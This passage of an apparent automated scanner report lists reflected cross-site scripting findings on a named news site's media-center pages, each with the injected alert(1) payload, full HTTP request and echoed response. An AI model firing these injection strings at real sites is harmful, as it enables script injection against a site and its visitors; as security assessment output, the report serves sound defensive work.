The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae3bb'-alert(1)-'395ad40a18f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/?ae3bb'-alert(1)-'395ad40a18f=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:23:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 439703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;
               
            // Converts the GET params to a JSON object
               mcParams = 'ae3bb'-alert(1)-'395ad40a18f=1'.toQueryParams();
               
               //alert(Object.inspect(mcParams));
               
               function updateData(key,val) {
                   
                   // update paramaters JSON
                   mcParams[key] = val;
                   
                   // Show loadi
...[SNIP]...

2.8. http://bostonherald.com/mediacenter/index.php [media_type_photo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The value of the media_type_photo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9268d'-alert(1)-'f2ec1eda6c3 was submitted in the media_type_photo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/index.php?media_type_photo=09268d'-alert(1)-'f2ec1eda6c3&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:36:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 323072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;
               
            // Converts the GET params to a JSON object
               mcParams = 'media_type_photo=09268d'-alert(1)-'f2ec1eda6c3&media_type_video=1&media_type_audio=0'.toQueryParams();
               
               //alert(Object.inspect(mcParams));
               
               function updateData(key,val) {
                   
                   // update paramaters JSON
                   mcParams[ke
...[SNIP]...

2.9. http://bostonherald.com/mediacenter/index.php [media_type_photo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The value of the media_type_photo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ebf"><script>alert(1)</script>22ef8972f94 was submitted in the media_type_photo parameter. This input was echoed as 99ebf\"><script>alert(1)</script>22ef8972f94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/index.php?media_type_photo=099ebf"><script>alert(1)</script>22ef8972f94&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 323126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<input type="checkbox" id="media_type_photo" name="media_type_photo" value="099ebf\"><script>alert(1)</script>22ef8972f94" checked="checked" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" />
...[SNIP]...

2.10. http://bostonherald.com/mediacenter/index.php [media_type_video parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The value of the media_type_video request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65fe9"><script>alert(1)</script>f95937acf11 was submitted in the media_type_video parameter. This input was echoed as 65fe9\"><script>alert(1)</script>f95937acf11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=165fe9"><script>alert(1)</script>f95937acf11&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:42:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 247968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<input type="checkbox" id="media_type_video" name="media_type_video" value="165fe9\"><script>alert(1)</script>f95937acf11" checked="checked" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" />
...[SNIP]...

2.11. http://bostonherald.com/mediacenter/index.php [media_type_video parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The value of the media_type_video request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa289'-alert(1)-'1f9055edff8 was submitted in the media_type_video parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=1aa289'-alert(1)-'1f9055edff8&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:42:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 323055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;
               
            // Converts the GET params to a JSON object
               mcParams = 'media_type_photo=0&media_type_video=1aa289'-alert(1)-'1f9055edff8&media_type_audio=0'.toQueryParams();
               
               //alert(Object.inspect(mcParams));
               
               function updateData(key,val) {
                   
                   // update paramaters JSON
                   mcParams[key] = val;
                   
   
...[SNIP]...

2.12. http://bostonherald.com/mediacenter/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7504e'-alert(1)-'d79ac0d1774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/index.php?7504e'-alert(1)-'d79ac0d1774=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 10:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 442500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;
               
            // Converts the GET params to a JSON object
               mcParams = '7504e'-alert(1)-'d79ac0d1774=1'.toQueryParams();
               
               //alert(Object.inspect(mcParams));
               
               function updateData(key,val) {
                   
                   // update paramaters JSON
                   mcParams[key] = val;
                   
                   // Show loadi
...[SNIP]...

2.13. http://bostonherald.com/mediacenter/video.php [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 441c5"><script>alert(1)</script>37ebb88cd1f was submitted in the height parameter. This input was echoed as 441c5\"><script>alert(1)</script>37ebb88cd1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275441c5"><script>alert(1)</script>37ebb88cd1f HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2676
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="adCompanionSubstitute" class="w320xh275441c5\"><script>alert(1)</script>37ebb88cd1f">
...[SNIP]...

2.14. http://bostonherald.com/mediacenter/video.php [media_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the media_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d872e</script><script>alert(1)</script>7390949a1e1 was submitted in the media_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697d872e</script><script>alert(1)</script>7390949a1e1&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2682
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
);

    tmObj.set("VideoURL", "http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20101106%2F110610weddingmg.flv&video_id=1697d872e</script><script>alert(1)</script>7390949a1e1");
tmObj.set("VideoTitle", "Wedding limo highjacking");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_ima
...[SNIP]...

2.15. http://bostonherald.com/mediacenter/video.php [program_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef7e8"><script>alert(1)</script>d6ee082395 was submitted in the program_id parameter. This input was echoed as ef7e8\"><script>alert(1)</script>d6ee082395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269ef7e8"><script>alert(1)</script>d6ee082395&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2718
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269ef7e8\"><script>alert(1)</script>d6ee082395_p.js">
...[SNIP]...

2.16. http://bostonherald.com/mediacenter/video.php [program_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7cc8</script><script>alert(1)</script>1deba88b8c was submitted in the program_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269e7cc8</script><script>alert(1)</script>1deba88b8c&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:50:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2730
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
tonherald.com/video/20101106/110610weddingmg.flv.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv.jpg");
       
           
           tmObj.start('4c6ebfbed6269e7cc8</script><script>alert(1)</script>1deba88b8c'); // Set in Acudeo Console
           
           // 49ee2ce0476b3 -- incl bottom companion ad
</script>
...[SNIP]...

2.17. http://bostonherald.com/mediacenter/video.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26471</script><script>alert(1)</script>312f5f181e0 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20101106/110610weddingmg.flv26471</script><script>alert(1)</script>312f5f181e0&media_id=1697&title=Wedding%20limo%20highjacking&program_id=4c6ebfbed6269&width=320&height=275 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
